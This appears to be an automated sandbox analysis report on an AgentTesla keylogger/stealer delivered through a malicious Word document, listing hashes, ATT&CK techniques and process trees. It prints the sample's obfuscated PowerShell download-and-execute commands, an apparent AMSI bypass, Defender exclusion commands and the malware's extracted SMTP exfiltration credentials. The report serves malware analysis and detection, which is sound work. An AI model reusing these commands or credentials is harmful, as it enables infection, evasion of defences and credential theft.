agenttesla | 27cb289230f6544ef667488a02ee6967b9f1c4cf0c9a4c4d57af8a374b2241d9

Analysis

max time kernel
150s
max time network
92s
platform
windows7_x64
resource
win7v20201028
submitted
08-04-2021 06:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

new_order20210408_14.doc
Size

824KB
MD5

fe54df1ab8565835d83177d1d03e2dd0
SHA1

153439d8a1edb4c3dea9fdb78c910dbb107abd58
SHA256

27cb289230f6544ef667488a02ee6967b9f1c4cf0c9a4c4d57af8a374b2241d9
SHA512

709e8104545ee5839d29d4b766ce0186101f65d1863100b6af54f7a4e4761d2a3cb3ca2e790e7772f452a9fb397f20391cc49d5c47841c11124c8e6fafe1931f

Score

10^/10

agenttesla evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://bit.ly/2RhLurR

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
m4ximilia@yandex.com
Password:
x103860*&1333

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1528	856	powershell.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	616	544	powershell.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1164	1868	powershell.exe	EXCEL.EXE

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/996-192-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral1/memory/996-193-0x000000000043763E-mapping.dmp	family_agenttesla
behavioral1/memory/996-196-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 616 powershell.exe
8 616 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

99864.exe99864.exe

pid process

1384 99864.exe
996 99864.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exe99864.exeWerFault.exe

pid process

616 powershell.exe
1384 99864.exe
544 WerFault.exe
544 WerFault.exe
544 WerFault.exe
544 WerFault.exe
544 WerFault.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
7	616	powershell.exe
8	616	powershell.exe

pid	process
616	powershell.exe
1384	99864.exe
544	WerFault.exe
544	WerFault.exe
544	WerFault.exe
544	WerFault.exe
544	WerFault.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

99864.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\99864.exe = "0"	99864.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	99864.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	99864.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe = "0"	99864.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

99864.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\KGpXzAMpWDmcnfKnkZdJaBfAImY = "C:\\Program Files\\Common Files\\System\\ItuUFCUFuPtBrvbgmZwrZlWEV\\svchost.exe"	99864.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

Processes:

99864.exe

pid	process
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

99864.exe

description pid process target process

PID 1384 set thread context of 996 1384 99864.exe 99864.exe

description	pid	process	target process
PID 1384 set thread context of 996	1384	99864.exe	99864.exe

Drops file in Program Files directory 2 IoCs

Processes:

99864.exe

description	ioc	process
File created	C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe	99864.exe
File opened for modification	C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe	99864.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

544 1384 WerFault.exe 99864.exe
Office loads VBA resources, possible macro or embedded object present
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

276 timeout.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	pid_target	process	target process
544	1384	WerFault.exe	99864.exe

pid	process
276	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEEXCEL.EXEEXCEL.EXEexcelcnv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1864 WINWORD.EXE

pid	process
1864	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe99864.exe99864.exeWerFault.exe

pid	process
1528	powershell.exe
616	powershell.exe
1164	powershell.exe
1528	powershell.exe
616	powershell.exe
1164	powershell.exe
940	powershell.exe
744	powershell.exe
1184	powershell.exe
940	powershell.exe
744	powershell.exe
1184	powershell.exe
1384	99864.exe
1384	99864.exe
1384	99864.exe
996	99864.exe
996	99864.exe
544	WerFault.exe
544	WerFault.exe
544	WerFault.exe
544	WerFault.exe
544	WerFault.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe99864.exepowershell.exepowershell.exepowershell.exe99864.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	616	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	1384	99864.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	996	99864.exe
Token: SeDebugPrivilege	544	WerFault.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXEEXCEL.EXE

pid process

1864 WINWORD.EXE
1864 WINWORD.EXE
856 EXCEL.EXE
544 EXCEL.EXE
1868 EXCEL.EXE

pid	process
1864	WINWORD.EXE
1864	WINWORD.EXE
856	EXCEL.EXE
544	EXCEL.EXE
1868	EXCEL.EXE

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXEEXCEL.EXEpowershell.exe99864.execmd.exe

description	pid	process	target process
PID 1864 wrote to memory of 2004	1864	WINWORD.EXE	splwow64.exe
PID 1864 wrote to memory of 2004	1864	WINWORD.EXE	splwow64.exe
PID 1864 wrote to memory of 2004	1864	WINWORD.EXE	splwow64.exe
PID 1864 wrote to memory of 2004	1864	WINWORD.EXE	splwow64.exe
PID 856 wrote to memory of 1528	856	EXCEL.EXE	powershell.exe
PID 856 wrote to memory of 1528	856	EXCEL.EXE	powershell.exe
PID 856 wrote to memory of 1528	856	EXCEL.EXE	powershell.exe
PID 856 wrote to memory of 1528	856	EXCEL.EXE	powershell.exe
PID 544 wrote to memory of 616	544	EXCEL.EXE	powershell.exe
PID 544 wrote to memory of 616	544	EXCEL.EXE	powershell.exe
PID 544 wrote to memory of 616	544	EXCEL.EXE	powershell.exe
PID 544 wrote to memory of 616	544	EXCEL.EXE	powershell.exe
PID 1868 wrote to memory of 1164	1868	EXCEL.EXE	powershell.exe
PID 1868 wrote to memory of 1164	1868	EXCEL.EXE	powershell.exe
PID 1868 wrote to memory of 1164	1868	EXCEL.EXE	powershell.exe
PID 1868 wrote to memory of 1164	1868	EXCEL.EXE	powershell.exe
PID 616 wrote to memory of 1384	616	powershell.exe	99864.exe
PID 616 wrote to memory of 1384	616	powershell.exe	99864.exe
PID 616 wrote to memory of 1384	616	powershell.exe	99864.exe
PID 616 wrote to memory of 1384	616	powershell.exe	99864.exe
PID 1384 wrote to memory of 940	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 940	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 940	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 940	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 1184	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 1184	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 1184	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 1184	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 744	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 744	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 744	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 744	1384	99864.exe	powershell.exe
PID 1384 wrote to memory of 1612	1384	99864.exe	cmd.exe
PID 1384 wrote to memory of 1612	1384	99864.exe	cmd.exe
PID 1384 wrote to memory of 1612	1384	99864.exe	cmd.exe
PID 1384 wrote to memory of 1612	1384	99864.exe	cmd.exe
PID 1612 wrote to memory of 276	1612	cmd.exe	timeout.exe
PID 1612 wrote to memory of 276	1612	cmd.exe	timeout.exe
PID 1612 wrote to memory of 276	1612	cmd.exe	timeout.exe
PID 1612 wrote to memory of 276	1612	cmd.exe	timeout.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 996	1384	99864.exe	99864.exe
PID 1384 wrote to memory of 544	1384	99864.exe	WerFault.exe
PID 1384 wrote to memory of 544	1384	99864.exe	WerFault.exe
PID 1384 wrote to memory of 544	1384	99864.exe	WerFault.exe
PID 1384 wrote to memory of 544	1384	99864.exe	WerFault.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\new_order20210408_14.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1864

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2004

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $FXEEWNeAIhqilyjV=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,86,86,75,75,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,57,48,55,54,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,86,86,75,75,41,59,125,101,108,115,101,32,123,125,59);[System.Text.Encoding]::ASCII.GetString($FXEEWNeAIhqilyjV)|IEX; (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2RhLurR ” , ”$ENv:teMp\99864.exe” ) ; stARt ”$ENv:tEMP\99864.exe”
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $FXEEWNeAIhqilyjV=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,86,86,75,75,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,57,48,55,54,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,86,86,75,75,41,59,125,101,108,115,101,32,123,125,59);[System.Text.Encoding]::ASCII.GetString($FXEEWNeAIhqilyjV)|IEX; (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2RhLurR ” , ”$ENv:teMp\99864.exe” ) ; stARt ”$ENv:tEMP\99864.exe”
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:616

C:\Users\Admin\AppData\Local\Temp\99864.exe
"C:\Users\Admin\AppData\Local\Temp\99864.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
4⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\timeout.exe
timeout 1
5⤵
- Delays execution with timeout.exe
PID:276

C:\Users\Admin\AppData\Local\Temp\99864.exe
"C:\Users\Admin\AppData\Local\Temp\99864.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 1844
4⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $FXEEWNeAIhqilyjV=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,86,86,75,75,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,57,48,55,54,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,86,86,75,75,41,59,125,101,108,115,101,32,123,125,59);[System.Text.Encoding]::ASCII.GetString($FXEEWNeAIhqilyjV)|IEX; (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2RhLurR ” , ”$ENv:teMp\99864.exe” ) ; stARt ”$ENv:tEMP\99864.exe”
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- Enumerates system info in registry
PID:1532

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03bfaf74-c48a-406b-812c-2684df821d22
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_19f3d325-c55d-447f-9611-e24c25945075
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
MD5
